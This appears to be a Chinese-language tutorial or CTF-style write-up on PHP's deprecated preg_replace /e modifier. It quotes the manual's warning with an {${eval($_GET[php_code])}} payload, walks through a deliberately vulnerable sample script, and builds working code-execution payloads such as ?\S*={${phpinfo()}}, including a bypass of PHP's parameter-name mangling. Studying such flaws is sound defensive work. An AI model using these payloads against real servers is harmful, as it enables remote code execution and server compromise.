preg_replace函数分析

函数简绍

这个函数用于php 替换文本

函数的原型是

preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed

意思就是将$subject 中的$pattern 替换成$replacement

但是特别的是在 $pattern中有一个匹配模式php 将其称之为模式修饰符

原文如下

模式修饰符:

下面列出了当前可用的 PCRE 修饰符。括号中提到的名字是 PCRE 内部这些修饰符的名称。 模式修饰符中的空格，换行符会被忽略，其他字符会导致错误。

• i (PCRE_CASELESS)

  如果设置了这个修饰符，模式中的字母会进行大小写不敏感匹配。

• m (PCRE_MULTILINE)

  默认情况下，PCRE 认为目标字符串是由单行字符组成的(然而实际上它可能会包含多行)， “行首”元字符 (^) 仅匹配字符串的开始位置， 而”行末”元字符 ($) 仅匹配字符串末尾， 或者最后的换行符(除非设置了 D 修饰符)。这个行为和 perl 相同。 当这个修饰符设置之后，“行首”和“行末”就会匹配目标字符串中任意换行符之前或之后，另外， 还分别匹配目标字符串的最开始和最末尾位置。这等同于 perl 的 /m 修饰符。如果目标字符串 中没有 “\n” 字符，或者模式中没有出现 ^ 或 $，设置这个修饰符不产生任何影响。

• s (PCRE_DOTALL)

  如果设置了这个修饰符，模式中的点号元字符匹配所有字符，包含换行符。如果没有这个 修饰符，点号不匹配换行符。这个修饰符等同于 perl 中的/s修饰符。 一个取反字符类比如 [^a] 总是匹配换行符，而不依赖于这个修饰符的设置。

• x (PCRE_EXTENDED)

  如果设置了这个修饰符，模式中的没有经过转义的或不在字符类中的空白数据字符总会被忽略， 并且位于一个未转义的字符类外部的#字符和下一个换行符之间的字符也被忽略。 这个修饰符 等同于 perl 中的 /x 修饰符，使被编译模式中可以包含注释。 注意：这仅用于数据字符。 空白字符 还是不能在模式的特殊字符序列中出现，比如序列 (?( 引入了一个条件子组(译注: 这种语法定义的 特殊字符序列中如果出现空白字符会导致编译错误。 比如(?(就会导致错误)。

• e (PREG_REPLACE_EVAL)

  WarningThis feature was DEPRECATED in PHP 5.5.0, and REMOVED as of PHP 7.0.0.如果设置了这个被弃用的修饰符， preg_replace() 在进行了对替换字符串的 后向引用替换之后, 将替换后的字符串作为php 代码评估执行(eval 函数方式)，并使用执行结果 作为实际参与替换的字符串。单引号、双引号、反斜线(**)和 NULL 字符在 后向引用替换时会被用反斜线转义.CautionThe addslashes() function is run on each matched backreference before the substitution takes place. As such, when the backreference is used as a quoted string, escaped characters will be converted to literals. However, characters which are escaped, which would normally not be converted, will retain their slashes. This makes use of this modifier very complicated.Caution请确保 replacement 参数由合法 php 代码字符串组成，否则 php 将会 在preg_replace() 调用的行上产生一个解释错误。Caution不建议使用此修饰符，它很容易产生安全漏洞：<?php$html = $_POST['html'];// uppercase headings$html = preg_replace( '(<h([1-6])>(.*?)</h\1>)e', '"<h$1>" . strtoupper("$2") . "</h$1>"', $html);以上示例代码能够被这样的字符串利用： *

  {${eval($_GET[php_code])}}

  *。 这能让攻击者执行他们想要的 PHP 代码，几乎完全渗透进服务器。为了阻止此类远程代码执行攻击，可以使用 preg_replace_callback() 替代：<?php$html = $_POST['html'];// uppercase headings$html = preg_replace_callback( '(<h([1-6])>(.*?)</h\1>)', function ($m) { return "<h$m[1]>" . strtoupper($m[2]) . "</h$m[1]>"; }, $html);Note:仅 preg_replace() 使用此修饰符，其他 PCRE 函数忽略此修饰符。

• A (PCRE_ANCHORED)

  如果设置了这个修饰符，模式被强制为”锚定”模式，也就是说约束匹配使其仅从 目标字符串的开始位置搜索。这个效果同样可以使用适当的模式构造出来，并且 这也是 perl 种实现这种模式的唯一途径。

• D (PCRE_DOLLAR_ENDONLY)

  如果这个修饰符被设置，模式中的元字符美元符号仅仅匹配目标字符串的末尾。如果这个修饰符 没有设置，当字符串以一个换行符结尾时， 美元符号还会匹配该换行符(但不会匹配之前的任何换行符)。 如果设置了修饰符m，这个修饰符被忽略. 在 perl 中没有与此修饰符等同的修饰符。

• S

  当一个模式需要多次使用的时候，为了得到匹配速度的提升，值得花费一些时间 对其进行一些额外的分析。如果设置了这个修饰符，这个额外的分析就会执行。当前， 这种对一个模式的分析仅仅适用于非锚定模式的匹配(即没有单独的固定开始字符)。

• U (PCRE_UNGREEDY)

  这个修饰符逆转了量词的”贪婪”模式。 使量词默认为非贪婪的，通过量词后紧跟*?* 的方式可以使其成为贪婪的。这和 perl 是不兼容的。 它同样可以使用 模式内修饰符设置 (?U)进行设置， 或者在量词后以问号标记其非贪婪(比如*.*?)。*Note:在非贪婪模式，通常不能匹配超过 pcre.backtrack_limit 的字符。

• X (PCRE_EXTRA)

  这个修饰符打开了 PCRE 与 perl 不兼容的附件功能。模式中的任意反斜线后就 ingen 一个 没有特殊含义的字符都会导致一个错误，以此保留这些字符以保证向后兼容性。 默认情况下，在 perl 中，反斜线紧跟一个没有特殊含义的字符被认为是该字符的原文。 当前没有其他特性由这个修饰符控制。

• J (PCRE_INFO_JCHANGED)

  内部选项设置(?J)修改本地的PCRE_DUPNAMES选项。允许子组重名， (译注：只能通过内部选项设置，外部的 /J 设置会产生错误。)

• u (PCRE_UTF8)

  此修正符打开一个与 perl 不兼容的附加功能。 模式和目标字符串都被认为是 utf-8 的。 无效的目标字符串会导致 preg_* 函数什么都匹配不到； 无效的模式字符串会导致 E_WARNING 级别的错误。 PHP 5.3.4 后，5字节和6字节的 UTF-8 字符序列被考虑为无效（resp. PCRE 7.3 2007-08-28）。 以前就被认为是无效的 UTF-8。

重点关注/e模式

当服务器使用这个函数，并且模式选择的是/e 的时候，会出现将第二个参数作为php 代码进行执行

示例

源代码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str)
{
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach ($_GET as $re => $str) {
    echo complex($re, $str) . "\n";
}

在这段代码中，我们实际可以控制的参数有第一个和第三个参数，但是会被执行的第二个参数却是不能被修改的

那么如何才能执行代码呢？

注意点1

注意看strtolower("\\1") 其实这个是 \1

首先\\1 结果就是\1然后使用() 就会进行匹配第一个匹配缓存区

官方的解释是

反向引用

对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中，所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始，最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 ‘\n’ 访问，其中 n 为一个标识特定缓冲区的一位或两位十进制数。

因此这里的\1指的就是第一个匹配区

注意点2

接着分析官方的payload

/?.*={${phpinfo()}}

这个payload 经过url 被服务端获取到结果是

参数名为.* 参数的值为{${phpinfo()}} 但是这里发现是执行不了这个代码的

这个是因为使用.*进行get传参的时候，使得.* ==> 变成了 _*

因为在php 中得.*是非法字符

这里可以使用其他方式进行绕过

这里给一个通用得payload

?\S*={${phpinfo()}}

这个形式就可以成功得执行了

成功得执行

注意点3

为什么这里一定要使用{${phpinfo()}}得形式呢？为什么不能直接给一个phpinfo() 这种形式？

这个是因为PHP 可变变量得原因

在PHP中双引号包裹的字符串中可以解析变量，而单引号则不行。 ${phpinfo()} 中的 phpinfo() 会被当做变量先执行，执行后，即变成 ${1} (phpinfo()成功执行返回true)

一下是我的分析结果，注释也是很重点得

<?php
$temp = var_dump(strtolower(phpinfo()));
echo "var_dump(strtolower(phpinfo())) 结果是：" . $temp;  //tmep是字符串 "1"，因为phpinfo()返回的是null
// echo var_dump(preg_replace('/(.*)/ie', '1', '{${phpinfo()}}'));
// echo "var_dump(preg_replace('/(.*)/ie', '1', '{${phpinfo()}}')) 结果是：" . $temp; //NULL 因为phpinfo() 执行了，变成了$1,$1是空

// $temp = var_dump(preg_replace('/(.*)/ie', 'strtolower("\\1")', '{${phpinfo()}}'));
// echo "var_dump(preg_replace('/(.*)/ie', 'strtolower(\"\\1\")', '{${phpinfo()}}')) 结果是：" . $temp; //NULL 因为phpinfo() 执行了，变成了$1,$1是空


$temp = var_dump(preg_replace('/(.*)/ie', 'strtolower("{${phpinfo()}}")', '{${phpinfo()}}'));
echo "var_dump(preg_replace('/(.*)/ie', 'strtolower(\"{${phpinfo()}}\")', '{${phpinfo()}}')) 结果是：" . $temp; //NULL 因为phpinfo() 执行了，变成了$1,$1是空

总结

?\S*={${phpinfo()}}